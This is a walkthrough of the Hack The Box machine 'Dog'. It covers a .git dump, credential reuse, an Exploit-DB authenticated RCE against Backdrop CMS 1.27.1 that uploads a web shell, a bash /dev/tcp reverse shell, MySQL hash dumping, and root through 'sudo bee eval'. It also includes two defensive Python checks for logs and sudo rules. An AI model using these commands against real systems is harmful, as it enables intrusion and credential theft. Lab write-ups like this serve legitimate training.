Dog
Recon
HTTP (80)
From the About page we get two pieces of information: the domain name, and that the CMS is Backdrop.

robots.txt
The file discloses some potential paths:
└─$ curl dog.htb/robots.txt -s | grep -v '#'
User-agent: *
Crawl-delay: 10
Disallow: /core/
Disallow: /profiles/
Disallow: /README.md
Disallow: /web.config
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout
Git Dump
Nmap showed that .git was accessible, so dump it:
└─$ git-dumper http://dog.htb dog_src
From the blog we have a username: dogBackDropSystem
Related tool: https://github.com/FisMatHack/BackDropScan
The installation profile's .info file discloses the exact version:
└─$ curl http://dog.htb/core/profiles/testing/testing.info
name = Testing
description = Minimal profile for running tests. Includes absolutely required modules only.
version = BACKDROP_VERSION
backdrop = 1.x
type = profile
hidden = TRUE
dependencies[] = layout
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
Backdrop version is 1.27.1
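As an added defender-side check, not part of the original writeup: an exposed .git tree and a world-readable testing.info leave a distinct footprint in the web server access log. The script below parses constructed Apache combined-format lines (IPs, timestamps and sizes are made up; the functions analyze and suspicious_clients are my own) and flags clients that successfully pulled repository objects or version-disclosing files.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines (not from the box). 10.10.14.131
# mirrors the git-dumper + testing.info activity in the writeup; 192.168.1.20
# is a normal visitor whose single /.git/HEAD probe was answered with 404.
SAMPLE_LOG = """\
10.10.14.131 - - [08/Mar/2025:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 612 "-" "curl/8.5.0"
10.10.14.131 - - [08/Mar/2025:10:00:05 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
10.10.14.131 - - [08/Mar/2025:10:00:05 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "python-requests/2.31"
10.10.14.131 - - [08/Mar/2025:10:00:06 +0000] "GET /.git/objects/82/04779c764abd4c9d8d95038b6d22b6a7515afa HTTP/1.1" 200 1820 "-" "python-requests/2.31"
10.10.14.131 - - [08/Mar/2025:10:00:09 +0000] "GET /core/profiles/testing/testing.info HTTP/1.1" 200 290 "-" "curl/8.5.0"
192.168.1.20 - - [08/Mar/2025:10:01:00 +0000] "GET /?q=node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.20 - - [08/Mar/2025:10:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Paths whose successful retrieval leaks source or version information:
# testing.info carries the exact Backdrop version and the other two are
# listed in robots.txt above. /.git/ (what git-dumper walks) is counted apart.
SENSITIVE_PREFIXES = ("/core/profiles/testing/testing.info",
                      "/README.md", "/web.config")

def analyze(log_text):
    """Per-client counters: successful/any /.git/ hits and leaked paths."""
    stats = defaultdict(lambda: {"git_ok": 0, "git_any": 0, "leaks": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        path = path.split("?", 1)[0]          # drop the query string
        ok = status.startswith("2")
        if path.startswith("/.git/"):
            stats[ip]["git_any"] += 1
            stats[ip]["git_ok"] += int(ok)
        elif ok and path.startswith(SENSITIVE_PREFIXES):
            stats[ip]["leaks"].append(path)
    return dict(stats)

def suspicious_clients(log_text, min_git_ok=1):
    """Clients that actually obtained repo data or a fingerprint file."""
    return sorted(ip for ip, s in analyze(log_text).items()
                  if s["git_ok"] >= min_git_ok or s["leaks"])

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

A 404 on /.git/HEAD is just a probe; a 200 means the repository, and everything committed to it, is already gone.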
Backdrop Authenticated RCE
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)

MySQL creds:
root:BackDropJ2024DS2024
The dogBackDropSystem user didn't work. If we search for the domain name inside the project source we get a valid user:
└─$ grep '@dog.htb' . -Rain
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: "tiffany@dog.htb"
./.git/logs/refs/heads/master:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/HEAD:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
Creds:
tiffany:BackDropJ2024DS2024

Web Shell
└─$ curl https://www.exploit-db.com/download/52021 -sLo rce.py
└─$ py rce.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php
The install URL above didn't work, but http://10.129.189.5/?q=admin/modules/install did.

Uploading shell.zip fails:
The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2.
Repack it as a .tgz:
└─$ tar -czvf shell.tgz shell/
shell/
shell/shell.info
shell/shell.php

The web shell is then reachable at:
http://dog.htb/modules/shell/shell.php?cmd=id

Reverse Shell
Get a reverse shell, because HTB deletes the modules periodically and the web shell becomes unusable:
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.131/4444 0>&1'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SHOW DATABASES;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SHOW TABLES;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SELECT * FROM users;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SELECT name,pass FROM users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------+---------------------------------------------------------+
| name | pass |
+-------------------+---------------------------------------------------------+
| jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. |
| jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 |
| dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD |
| john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. |
| morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS |
| axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV |
| rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT |
| tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v |
+-------------------+---------------------------------------------------------+
No luck cracking the hashes:
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes.txt --wordlist=.\wordlist.txt
SSH (22)
Password Reuse
Try password reuse:
(remote) www-data@dog:/var/www/html$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
└─$ sshpass -p 'BackDropJ2024DS2024' ssh jobert@dog.htb
└─$ sshpass -p 'BackDropJ2024DS2024' ssh johncusack@dog.htb
johncusack@dog:~$ id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)
Creds:
johncusack:BackDropJ2024DS2024
User.txt
johncusack@dog:~$ cat user.txt
767f04adc441bc96280bfcaf26e33237
Privilege Escalation
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ bee version
✔ Bee for Backdrop CMS - Version 1.x-1.x
In the help menu we have eval:
ADVANCED
...
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
...
johncusack@dog:~$ sudo bee eval 'system("id")'
✘ The required bootstrap level for 'eval' is not ready.
johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("id")'
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("bash")'
root@dog:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
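As an added hardening check, not part of the original writeup: the sudo rule above is equivalent to a root shell because bee's eval / php-eval subcommands run arbitrary PHP as the target user. The script below parses sudo -l style output (the sample is constructed: the bee rule from the box plus two made-up rules for contrast; parse_rules and audit are my own functions) and flags rules that hand out code execution or accept arbitrary arguments.

```python
import re

# Constructed `sudo -l` output: the bee rule found on the box plus two
# made-up rules for contrast (one argument-restricted, one interpreter).
SAMPLE_SUDO_L = """\
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/php
"""

# One rule line: "(runas_user[ : runas_group]) [TAG: ...] command [args]"
RULE_RE = re.compile(r'^\s*\((?P<user>[^)\s]+)(?:\s*:\s*(?P<group>[^)\s]+))?\)\s*'
                     r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$')

# Binaries that evaluate arbitrary code regardless of how the rule is scoped.
# bee is the finding on this box: its eval / php-eval subcommands run any PHP
# with the privileges of the sudo target user once --root points at the site.
CODE_EXEC = {
    "bee": "eval / php-eval executes arbitrary PHP as the target user",
    "php": "interpreter executes arbitrary PHP as the target user",
}

def parse_rules(text):
    """Extract the privilege rules from `sudo -l` output."""
    return [m.groupdict() for line in text.splitlines()
            if (m := RULE_RE.match(line))]

def audit(text):
    """Return (command, severity, reason) for each rule that needs fixing."""
    findings = []
    for r in parse_rules(text):
        argv = r["cmd"].split()
        base = argv[0].rsplit("/", 1)[-1]
        as_root = r["user"] in ("ALL", "root")
        if base in CODE_EXEC:
            findings.append((r["cmd"], "CRITICAL" if as_root else "HIGH",
                             CODE_EXEC[base]))
        elif len(argv) == 1 and as_root:
            findings.append((r["cmd"], "MEDIUM",
                             "no argument restriction: any option is allowed"))
    return findings
```

The fix is not to pin bee's arguments but to drop the rule: a site-management tool that can evaluate PHP cannot be made safe under sudo.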
Root.txt
root@dog:/var/www/html# cat /root/root.txt
82e235d6179edd817b4fdb8c1f7aefe2